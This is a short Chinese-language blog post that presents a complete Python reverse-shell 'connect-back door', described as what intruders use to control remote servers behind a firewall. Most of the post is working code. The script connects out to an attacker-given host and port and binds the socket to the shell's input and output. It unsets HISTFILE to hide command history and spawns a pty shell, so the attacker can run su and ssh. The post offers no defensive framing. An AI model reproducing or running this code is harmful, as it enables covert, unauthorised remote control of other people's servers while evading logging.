很多入侵者都會(huì)在正面遇到防火墻之后，采用反向鏈接的方法控制遠(yuǎn)程服務(wù)器。早期大家都用perl或c代碼寫。現(xiàn)在大家都與時(shí)俱進(jìn)了，用python寫了。代碼量減少很多啊。

小雨寫的一個(gè)，替代之前的perl版本的，可以直接返回ttyshell。返回的shell可以直接ssh，su等操作。

代碼如下：

#!/usr/bin/python
import sys
import os
import socket
import pty

shell = "/bin/sh"

def usage(programname):
print "ython connect-back door"
print "Usage: %s " % programname

def main():
if len(sys.argv) !=3:
usage(sys.argv[0])
sys.exit(1)

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

try:
s.connect((socket.gethostbyname(sys.argv[1]),int(sys.argv[2])))
print "[+]Connect OK."
except:
print "[-]Can't connect"
sys.exit(2)

os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
global shell
os.unsetenv("HISTFILE")
os.unsetenv("HISTFILESIZE")
pty.spawn(shell)
s.close()

if __name__ == "__main__":
main()

【編輯推薦】